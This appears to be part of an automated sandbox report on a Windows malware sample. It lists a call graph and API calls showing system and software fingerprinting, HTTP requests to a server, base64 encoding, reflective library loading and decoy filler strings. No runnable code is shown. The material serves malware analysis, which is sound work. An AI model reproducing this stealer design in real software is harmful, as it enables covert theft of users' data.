87a8a0 lstrcpy 15140->15141 15142 871ec5 15141->15142 15143 87a9b0 4 API calls 15142->15143 15144 871ee5 15143->15144 15145 87a8a0 lstrcpy 15144->15145 15146 871eee 15145->15146 15782 877b00 GetUserDefaultLocaleName 15146->15782 15149 87a9b0 4 API calls 15150 871f0e 15149->15150 15151 87a8a0 lstrcpy 15150->15151 15152 871f17 15151->15152 15153 87a9b0 4 API calls 15152->15153 15154 871f36 15153->15154 15155 87a8a0 lstrcpy 15154->15155 15156 871f3f 15155->15156 15157 87a9b0 4 API calls 15156->15157 15158 871f60 15157->15158 15159 87a8a0 lstrcpy 15158->15159 15160 871f69 15159->15160 15786 877b90 15160->15786 15162 871f80 15163 87a920 3 API calls 15162->15163 15164 871f93 15163->15164 15165 87a8a0 lstrcpy 15164->15165 15166 871f9c 15165->15166 15167 87a9b0 4 API calls 15166->15167 15168 871fc6 15167->15168 15169 87a8a0 lstrcpy 15168->15169 15170 871fcf 15169->15170 15171 87a9b0 4 API calls 15170->15171 15172 871fef 15171->15172 15173 87a8a0 lstrcpy 15172->15173 15174 871ff8 15173->15174 15798 877d80 GetSystemPowerStatus 15174->15798 15177 87a9b0 4 API calls 15178 872018 15177->15178 15179 87a8a0 lstrcpy 15178->15179 15180 872021 15179->15180 15181 87a9b0 4 API calls 15180->15181 15182 872040 15181->15182 15183 87a8a0 lstrcpy 15182->15183 15184 872049 15183->15184 15185 87a9b0 4 API calls 15184->15185 15186 87206a 15185->15186 15187 87a8a0 lstrcpy 15186->15187 15188 872073 15187->15188 15189 87207e GetCurrentProcessId 15188->15189 15800 879470 OpenProcess 15189->15800 15192 87a920 3 API calls 15193 8720a4 15192->15193 15194 87a8a0 lstrcpy 15193->15194 15195 8720ad 15194->15195 15196 87a9b0 4 API calls 15195->15196 15197 8720d7 15196->15197 15198 87a8a0 lstrcpy 15197->15198 15199 8720e0 15198->15199 15200 87a9b0 4 API calls 15199->15200 15201 872100 15200->15201 15202 87a8a0 lstrcpy 15201->15202 15203 872109 15202->15203 15805 877e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15203->15805 15206 87a9b0 4 API calls 15207 872129 15206->15207 15208 87a8a0 lstrcpy 15207->15208 15209 872132 15208->15209 15210 87a9b0 4 API calls 15209->15210 15211 872151 15210->15211 15212 87a8a0 lstrcpy 15211->15212 15213 87215a 15212->15213 15214 87a9b0 4 API calls 15213->15214 15215 87217b 15214->15215 15216 87a8a0 lstrcpy 15215->15216 15217 872184 15216->15217 15809 877f60 15217->15809 15220 87a9b0 4 API calls 15221 8721a4 15220->15221 15222 87a8a0 lstrcpy 15221->15222 15223 8721ad 15222->15223 15224 87a9b0 4 API calls 15223->15224 15225 8721cc 15224->15225 15226 87a8a0 lstrcpy 15225->15226 15227 8721d5 15226->15227 15228 87a9b0 4 API calls 15227->15228 15229 8721f6 15228->15229 15230 87a8a0 lstrcpy 15229->15230 15231 8721ff 15230->15231 15822 877ed0 GetSystemInfo wsprintfA 15231->15822 15234 87a9b0 4 API calls 15235 87221f 15234->15235 15236 87a8a0 lstrcpy 15235->15236 15237 872228 15236->15237 15238 87a9b0 4 API calls 15237->15238 15239 872247 15238->15239 15240 87a8a0 lstrcpy 15239->15240 15241 872250 15240->15241 15242 87a9b0 4 API calls 15241->15242 15243 872270 15242->15243 15244 87a8a0 lstrcpy 15243->15244 15245 872279 15244->15245 15824 878100 GetProcessHeap RtlAllocateHeap 15245->15824 15248 87a9b0 4 API calls 15249 872299 15248->15249 15250 87a8a0 lstrcpy 15249->15250 15251 8722a2 15250->15251 15252 87a9b0 4 API calls 15251->15252 15253 8722c1 15252->15253 15254 87a8a0 lstrcpy 15253->15254 15255 8722ca 15254->15255 15256 87a9b0 4 API calls 15255->15256 15257 8722eb 15256->15257 15258 87a8a0 lstrcpy 15257->15258 15259 8722f4 15258->15259 15830 8787c0 15259->15830 15262 87a920 3 API calls 15263 87231e 15262->15263 15264 87a8a0 lstrcpy 15263->15264 15265 872327 15264->15265 15266 87a9b0 4 API calls 15265->15266 15267 872351 15266->15267 15268 87a8a0 lstrcpy 15267->15268 15269 87235a 15268->15269 15270 87a9b0 4 API calls 15269->15270 15271 87237a 15270->15271 15272 87a8a0 lstrcpy 15271->15272 15273 872383 15272->15273 15274 87a9b0 4 API calls 15273->15274 15275 8723a2 15274->15275 15276 87a8a0 lstrcpy 15275->15276 15277 8723ab 15276->15277 15835 8781f0 15277->15835 15279 8723c2 15280 87a920 3 API calls 15279->15280 15281 8723d5 15280->15281 15282 87a8a0 lstrcpy 15281->15282 15283 8723de 15282->15283 15284 87a9b0 4 API calls 15283->15284 15285 87240a 15284->15285 15286 87a8a0 lstrcpy 15285->15286 15287 872413 15286->15287 15288 87a9b0 4 API calls 15287->15288 15289 872432 15288->15289 15290 87a8a0 lstrcpy 15289->15290 15291 87243b 15290->15291 15292 87a9b0 4 API calls 15291->15292 15293 87245c 15292->15293 15294 87a8a0 lstrcpy 15293->15294 15295 872465 15294->15295 15296 87a9b0 4 API calls 15295->15296 15297 872484 15296->15297 15298 87a8a0 lstrcpy 15297->15298 15299 87248d 15298->15299 15300 87a9b0 4 API calls 15299->15300 15301 8724ae 15300->15301 15302 87a8a0 lstrcpy 15301->15302 15303 8724b7 15302->15303 15843 878320 15303->15843 15305 8724d3 15306 87a920 3 API calls 15305->15306 15307 8724e6 15306->15307 15308 87a8a0 lstrcpy 15307->15308 15309 8724ef 15308->15309 15310 87a9b0 4 API calls 15309->15310 15311 872519 15310->15311 15312 87a8a0 lstrcpy 15311->15312 15313 872522 15312->15313 15314 87a9b0 4 API calls 15313->15314 15315 872543 15314->15315 15316 87a8a0 lstrcpy 15315->15316 15317 87254c 15316->15317 15318 878320 17 API calls 15317->15318 15319 872568 15318->15319 15320 87a920 3 API calls 15319->15320 15321 87257b 15320->15321 15322 87a8a0 lstrcpy 15321->15322 15323 872584 15322->15323 15324 87a9b0 4 API calls 15323->15324 15325 8725ae 15324->15325 15326 87a8a0 lstrcpy 15325->15326 15327 8725b7 15326->15327 15328 87a9b0 4 API calls 15327->15328 15329 8725d6 15328->15329 15330 87a8a0 lstrcpy 15329->15330 15331 8725df 15330->15331 15332 87a9b0 4 API calls 15331->15332 15333 872600 15332->15333 15334 87a8a0 lstrcpy 15333->15334 15335 872609 15334->15335 15879 878680 15335->15879 15337 872620 15338 87a920 3 API calls 15337->15338 15339 872633 15338->15339 15340 87a8a0 lstrcpy 15339->15340 15341 87263c 15340->15341 15342 87265a lstrlen 15341->15342 15343 87266a 15342->15343 15344 87a740 lstrcpy 15343->15344 15345 87267c 15344->15345 15346 861590 lstrcpy 15345->15346 15347 87268d 15346->15347 15889 875190 15347->15889 15349 872699 15349->13781 16077 87aad0 15350->16077 15352 865009 InternetOpenUrlA 15356 865021 15352->15356 15353 8650a0 InternetCloseHandle InternetCloseHandle 15355 8650ec 15353->15355 15354 86502a InternetReadFile 15354->15356 15355->13785 15356->15353 15356->15354 16078 8698d0 15357->16078 15359 870759 15360 87077d 15359->15360 15361 870a38 15359->15361 15364 870799 StrCmpCA 15360->15364 15362 861590 lstrcpy 15361->15362 15363 870a49 15362->15363 16254 870250 15363->16254 15366 870843 15364->15366 15367 8707a8 15364->15367 15370 870865 StrCmpCA 15366->15370 15369 87a7a0 lstrcpy 15367->15369 15371 8707c3 15369->15371 15372 870874 15370->15372 15409 87096b 15370->15409 15373 861590 lstrcpy 15371->15373 15375 87a740 lstrcpy 15372->15375 15374 87080c 15373->15374 15376 87a7a0 lstrcpy 15374->15376 15378 870881 15375->15378 15379 870823 15376->15379 15377 87099c StrCmpCA 15380 870a2d 15377->15380 15381 8709ab 15377->15381 15382 87a9b0 4 API calls 15378->15382 15383 87a7a0 lstrcpy 15379->15383 15380->13789 15384 861590 lstrcpy 15381->15384 15385 8708ac 15382->15385 15386 87083e 15383->15386 15387 8709f4 15384->15387 15388 87a920 3 API calls 15385->15388 16081 86fb00 15386->16081 15391 87a7a0 lstrcpy 15387->15391 15389 8708b3 15388->15389 15392 87a9b0 4 API calls 15389->15392 15393 870a0d 15391->15393 15395 8708ba 15392->15395 15394 87a7a0 lstrcpy 15393->15394 15396 870a28 15394->15396 15397 87a8a0 lstrcpy 15395->15397 15409->15377 15729 87a7a0 lstrcpy 15728->15729 15730 861683 15729->15730 15731 87a7a0 lstrcpy 15730->15731 15732 861695 15731->15732 15733 87a7a0 lstrcpy 15732->15733 15734 8616a7 15733->15734 15735 87a7a0 lstrcpy 15734->15735 15736 8615a3 15735->15736 15736->14612 15738 8647c6 15737->15738 15739 864838 lstrlen 15738->15739 15763 87aad0 15739->15763 15741 864848 InternetCrackUrlA 15742 864867 15741->15742 15742->14689 15744 87a740 lstrcpy 15743->15744 15745 878b74 15744->15745 15746 87a740 lstrcpy 15745->15746 15747 878b82 GetSystemTime 15746->15747 15749 878b99 15747->15749 15748 87a7a0 lstrcpy 15750 878bfc 15748->15750 15749->15748 15750->14704 15752 87a931 15751->15752 15753 87a988 15752->15753 15755 87a968 lstrcpy lstrcat 15752->15755 15754 87a7a0 lstrcpy 15753->15754 15756 87a994 15754->15756 15755->15753 15756->14707 15757->14822 15759 864eee 15758->15759 15760 869af9 LocalAlloc 15758->15760 15759->14710 15759->14712 15760->15759 15761 869b14 CryptStringToBinaryA 15760->15761 15761->15759 15762 869b39 LocalFree 15761->15762 15762->15759 15763->15741 15764->14832 15765->14973 15766->14975 15767->14983 15896 8777a0 15768->15896 15771 8776c6 RegOpenKeyExA 15773 8776e7 RegQueryValueExA 15771->15773 15774 877704 RegCloseKey 15771->15774 15772 871c1e 15772->15065 15773->15774 15774->15772 15776 871c99 15775->15776 15776->15079 15778 871e09 15777->15778 15778->15121 15780 871e84 15779->15780 15781 877a9a wsprintfA 15779->15781 15780->15135 15781->15780 15783 871efe 15782->15783 15784 877b4d 15782->15784 15783->15149 15903 878d20 LocalAlloc CharToOemW 15784->15903 15787 87a740 lstrcpy 15786->15787 15788 877bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15787->15788 15795 877c25 15788->15795 15789 877c46 GetLocaleInfoA 15789->15795 15790 877d18 15791 877d1e LocalFree 15790->15791 15792 877d28 15790->15792 15791->15792 15793 87a7a0 lstrcpy 15792->15793 15797 877d37 15793->15797 15794 87a9b0 lstrcpy lstrlen lstrcpy lstrcat 15794->15795 15795->15789 15795->15790 15795->15794 15796 87a8a0 lstrcpy 15795->15796 15796->15795 15797->15162 15799 872008 15798->15799 15799->15177 15801 8794b5 15800->15801 15802 879493 GetModuleFileNameExA CloseHandle 15800->15802 15803 87a740 lstrcpy 15801->15803 15802->15801 15804 872091 15803->15804 15804->15192 15806 872119 15805->15806 15807 877e68 RegQueryValueExA 15805->15807 15806->15206 15808 877e8e RegCloseKey 15807->15808 15808->15806 15810 877fb9 GetLogicalProcessorInformationEx 15809->15810 15811 877fd8 GetLastError 15810->15811 15814 878029 15810->15814 15819 878022 15811->15819 15821 877fe3 15811->15821 15816 8789f0 2 API calls 15814->15816 15815 8789f0 2 API calls 15817 872194 15815->15817 15818 87807b 15816->15818 15817->15220 15818->15819 15820 878084 wsprintfA 15818->15820 15819->15815 15819->15817 15820->15817 15821->15810 15821->15817 15904 8789f0 15821->15904 15907 878a10 GetProcessHeap RtlAllocateHeap 15821->15907 15823 87220f 15822->15823 15823->15234 15825 8789b0 15824->15825 15826 87814d GlobalMemoryStatusEx 15825->15826 15829 878163 __aulldiv 15826->15829 15827 87819b wsprintfA 15828 872289 15827->15828 15828->15248 15829->15827 15831 8787fb GetProcessHeap RtlAllocateHeap wsprintfA 15830->15831 15833 87a740 lstrcpy 15831->15833 15834 87230b 15833->15834 15834->15262 15836 87a740 lstrcpy 15835->15836 15842 878229 15836->15842 15837 878263 15838 87a7a0 lstrcpy 15837->15838 15840 8782dc 15838->15840 15839 87a9b0 lstrcpy lstrlen lstrcpy lstrcat 15839->15842 15840->15279 15841 87a8a0 lstrcpy 15841->15842 15842->15837 15842->15839 15842->15841 15844 87a740 lstrcpy 15843->15844 15845 87835c RegOpenKeyExA 15844->15845 15846 8783d0 15845->15846 15847 8783ae 15845->15847 15849 878613 RegCloseKey 15846->15849 15850 8783f8 RegEnumKeyExA 15846->15850 15848 87a7a0 lstrcpy 15847->15848 15860 8783bd 15848->15860 15851 87a7a0 lstrcpy 15849->15851 15852 87843f wsprintfA RegOpenKeyExA 15850->15852 15853 87860e 15850->15853 15851->15860 15854 878485 RegCloseKey RegCloseKey 15852->15854 15855 8784c1 RegQueryValueExA 15852->15855 15853->15849 15858 87a7a0 lstrcpy 15854->15858 15856 878601 RegCloseKey 15855->15856 15857 8784fa lstrlen 15855->15857 15856->15853 15857->15856 15859 878510 15857->15859 15858->15860 15861 87a9b0 4 API calls 15859->15861 15860->15305 15862 878527 15861->15862 15863 87a8a0 lstrcpy 15862->15863 15864 878533 15863->15864 15865 87a9b0 4 API calls 15864->15865 15866 878557 15865->15866 15867 87a8a0 lstrcpy 15866->15867 15868 878563 15867->15868 15869 87856e RegQueryValueExA 15868->15869 15869->15856 15870 8785a3 15869->15870 15871 87a9b0 4 API calls 15870->15871 15872 8785ba 15871->15872 15873 87a8a0 lstrcpy 15872->15873 15874 8785c6 15873->15874 15875 87a9b0 4 API calls 15874->15875 15876 8785ea 15875->15876 15877 87a8a0 lstrcpy 15876->15877 15878 8785f6 15877->15878 15878->15856 15880 87a740 lstrcpy 15879->15880 15881 8786bc CreateToolhelp32Snapshot Process32First 15880->15881 15882 87875d CloseHandle 15881->15882 15883 8786e8 Process32Next 15881->15883 15884 87a7a0 lstrcpy 15882->15884 15883->15882 15888 8786fd 15883->15888 15885 878776 15884->15885 15885->15337 15886 87a8a0 lstrcpy 15886->15888 15887 87a9b0 lstrcpy lstrlen lstrcpy lstrcat 15887->15888 15888->15883 15888->15886 15888->15887 15890 87a7a0 lstrcpy 15889->15890 15891 8751b5 15890->15891 15892 861590 lstrcpy 15891->15892 15893 8751c6 15892->15893 15908 865100 15893->15908 15895 8751cf 15895->15349 15899 877720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15896->15899 15898 8776b9 15898->15771 15898->15772 15900 877765 RegQueryValueExA 15899->15900 15901 877780 RegCloseKey 15899->15901 15900->15901 15902 877793 15901->15902 15902->15898 15903->15783 15905 878a0c 15904->15905 15906 8789f9 GetProcessHeap HeapFree 15904->15906 15905->15821 15906->15905 15907->15821 15909 87a7a0 lstrcpy 15908->15909 15910 865119 15909->15910 15911 8647b0 2 API calls 15910->15911 15912 865125 15911->15912 16068 878ea0 15912->16068 15914 865184 15915 865192 lstrlen 15914->15915 15916 8651a5 15915->15916 15917 878ea0 4 API calls 15916->15917 15918 8651b6 15917->15918 15919 87a740 lstrcpy 15918->15919 15920 8651c9 15919->15920 15921 87a740 lstrcpy 15920->15921 15922 8651d6 15921->15922 15923 87a740 lstrcpy 15922->15923 15924 8651e3 15923->15924 15925 87a740 lstrcpy 15924->15925 15926 8651f0 15925->15926 15927 87a740 lstrcpy 15926->15927 15928 8651fd InternetOpenA StrCmpCA 15927->15928 15929 86522f 15928->15929 15930 8658c4 InternetCloseHandle 15929->15930 15931 878b60 3 API calls 15929->15931 15937 8658d9 codecvt 15930->15937 15932 86524e 15931->15932 15933 87a920 3 API calls 15932->15933 15934 865261 15933->15934 15935 87a8a0 lstrcpy 15934->15935 15936 86526a 15935->15936 15938 87a9b0 4 API calls 15936->15938 15941 87a7a0 lstrcpy 15937->15941 15939 8652ab 15938->15939 15940 87a920 3 API calls 15939->15940 15942 8652b2 15940->15942 15949 865913 15941->15949 15943 87a9b0 4 API calls 15942->15943 15944 8652b9 15943->15944 15945 87a8a0 lstrcpy 15944->15945 15946 8652c2 15945->15946 15947 87a9b0 4 API calls 15946->15947 15948 865303 15947->15948 15950 87a920 3 API calls 15948->15950 15949->15895 15951 86530a 15950->15951 15952 87a8a0 lstrcpy 15951->15952 15953 865313 15952->15953 15954 865329 InternetConnectA 15953->15954 15954->15930 15955 865359 HttpOpenRequestA 15954->15955 15957 8658b7 InternetCloseHandle 15955->15957 15958 8653b7 15955->15958 15957->15930 15959 87a9b0 4 API calls 15958->15959 15960 8653cb 15959->15960 15961 87a8a0 lstrcpy 15960->15961 15962 8653d4 15961->15962 15963 87a920 3 API calls 15962->15963 15964 8653f2 15963->15964 15965 87a8a0 lstrcpy 15964->15965 15966 8653fb 15965->15966 15967 87a9b0 4 API calls 15966->15967 15968 86541a 15967->15968 15969 87a8a0 lstrcpy 15968->15969 15970 865423 15969->15970 15971 87a9b0 4 API calls 15970->15971 15972 865444 15971->15972 15973 87a8a0 lstrcpy 15972->15973 15974 86544d 15973->15974 15975 87a9b0 4 API calls 15974->15975 15976 86546e 15975->15976 16069 878ead CryptBinaryToStringA 16068->16069 16070 878ea9 16068->16070 16069->16070 16071 878ece GetProcessHeap RtlAllocateHeap 16069->16071 16070->15914 16071->16070 16072 878ef4 codecvt 16071->16072 16073 878f05 CryptBinaryToStringA 16072->16073 16073->16070 16077->15352 16320 869880 16078->16320 16080 8698e1 16080->15359 16082 87a740 lstrcpy 16081->16082 16083 86fb16 16082->16083 16255 87a740 lstrcpy 16254->16255 16256 870266 16255->16256 16257 878de0 2 API calls 16256->16257 16258 87027b 16257->16258 16259 87a920 3 API calls 16258->16259 16260 87028b 16259->16260 16261 87a8a0 lstrcpy 16260->16261 16262 870294 16261->16262 16263 87a9b0 4 API calls 16262->16263 16321 86988e 16320->16321 16324 866fb0 16321->16324 16323 8698ad codecvt 16323->16080 16327 866d40 16324->16327 16328 866d63 16327->16328 16341 866d59 16327->16341 16343 866530 16328->16343 16332 866dbe 16332->16341 16353 8669b0 16332->16353 16334 866e2a 16335 866ee6 VirtualFree 16334->16335 16337 866ef7 16334->16337 16334->16341 16335->16337 16336 866f41 16338 8789f0 2 API calls 16336->16338 16336->16341 16337->16336 16339 866f26 FreeLibrary 16337->16339 16340 866f38 16337->16340 16338->16341 16339->16337 16342 8789f0 2 API calls 16340->16342 16341->16323 16342->16336 16344 866542 16343->16344 16346 866549 16344->16346 16363 878a10 GetProcessHeap RtlAllocateHeap 16344->16363 16346->16341 16347 866660 16346->16347 16350 86668f VirtualAlloc 16347->16350 16349 866730 16351 866743 VirtualAlloc 16349->16351 16352 86673c 16349->16352 16350->16349 16350->16352 16351->16352 16352->16332 16354 8669c9 16353->16354 16358 8669d5 16353->16358 16355 866a09 LoadLibraryA 16354->16355 16354->16358 16356 866a32 16355->16356 16355->16358 16362 866ae0 16356->16362 16364 878a10 GetProcessHeap RtlAllocateHeap 16356->16364 16358->16334 16359 866ba8 GetProcAddress 16359->16358 16359->16362 16360 8789f0 2 API calls 16360->16362 16361 866a8b 16361->16358 16361->16360 16362->16358 16362->16359 16363->16346 16364->16361

                        Executed Functions

                        Function 00879860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 879860-879874 call 879750 663 879a93-879af2 LoadLibraryA * 5 660->663 664 87987a-879a8e call 879780 GetProcAddress * 21 660->664 666 879af4-879b08 GetProcAddress 663->666 667 879b0d-879b14 663->667 664->663 666->667 668 879b46-879b4d 667->668 669 879b16-879b41 GetProcAddress * 2 667->669 671 879b4f-879b63 GetProcAddress 668->671 672 879b68-879b6f 668->672 669->668 671->672 673 879b71-879b84 GetProcAddress 672->673 674 879b89-879b90 672->674 673->674 675 879b92-879bbc GetProcAddress * 2 674->675 676 879bc1-879bc2 674->676 675->676
                        APIs
                        • GetProcAddress.KERNEL32(75900000,01161190), ref: 008798A1
                        • GetProcAddress.KERNEL32(75900000,01161298), ref: 008798BA
                        • GetProcAddress.KERNEL32(75900000,01161340), ref: 008798D2
                        • GetProcAddress.KERNEL32(75900000,011613B8), ref: 008798EA
                        • GetProcAddress.KERNEL32(75900000,011611D8), ref: 00879903
                        • GetProcAddress.KERNEL32(75900000,01169498), ref: 0087991B
                        • GetProcAddress.KERNEL32(75900000,01157368), ref: 00879933
                        • GetProcAddress.KERNEL32(75900000,01157568), ref: 0087994C
                        • GetProcAddress.KERNEL32(75900000,01161118), ref: 00879964
                        • GetProcAddress.KERNEL32(75900000,01161130), ref: 0087997C
                        • GetProcAddress.KERNEL32(75900000,011612B0), ref: 00879995
                        • GetProcAddress.KERNEL32(75900000,01161310), ref: 008799AD
                        • GetProcAddress.KERNEL32(75900000,01157588), ref: 008799C5
                        • GetProcAddress.KERNEL32(75900000,01161358), ref: 008799DE
                        • GetProcAddress.KERNEL32(75900000,01161370), ref: 008799F6
                        • GetProcAddress.KERNEL32(75900000,01157508), ref: 00879A0E
                        • GetProcAddress.KERNEL32(75900000,01161160), ref: 00879A27
                        • GetProcAddress.KERNEL32(75900000,011614A8), ref: 00879A3F
                        • GetProcAddress.KERNEL32(75900000,011575A8), ref: 00879A57
                        • GetProcAddress.KERNEL32(75900000,01161448), ref: 00879A70
                        • GetProcAddress.KERNEL32(75900000,01157348), ref: 00879A88
                        • LoadLibraryA.KERNEL32(011614C0,?,00876A00), ref: 00879A9A
                        • LoadLibraryA.KERNEL32(01161400,?,00876A00), ref: 00879AAB
                        • LoadLibraryA.KERNEL32(01161418,?,00876A00), ref: 00879ABD
                        • LoadLibraryA.KERNEL32(01161430,?,00876A00), ref: 00879ACF
                        • LoadLibraryA.KERNEL32(01161460,?,00876A00), ref: 00879AE0
                        • GetProcAddress.KERNEL32(75070000,01161478), ref: 00879B02
                        • GetProcAddress.KERNEL32(75FD0000,01161490), ref: 00879B23
                        • GetProcAddress.KERNEL32(75FD0000,01169B00), ref: 00879B3B
                        • GetProcAddress.KERNEL32(75A50000,01169B18), ref: 00879B5D
                        • GetProcAddress.KERNEL32(74E50000,011572E8), ref: 00879B7E
                        • GetProcAddress.KERNEL32(76E80000,01169488), ref: 00879B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00879BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00879BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 768e60604c164e94284c4fd93d5bbe52c4635418c4cef43f3e893915aa2557ad
                        • Instruction ID: 1e5bcc97b47987ea71b2905b462f20bc1cc0620f8582dd1ea0758b780ea74bf3
                        • Opcode Fuzzy Hash: 768e60604c164e94284c4fd93d5bbe52c4635418c4cef43f3e893915aa2557ad
                        • Instruction Fuzzy Hash: 36A13FB66002529FD395EFE8ED88A6637F9F76E301704851AE609C32E4D7399843CF52
                        Function 008645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 8645c0-864695 RtlAllocateHeap 781 8646a0-8646a6 764->781 782 86474f-8647a9 VirtualProtect 781->782 783 8646ac-86474a 781->783 783->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0086460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0086479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008646AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008645E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00864713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0086475A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
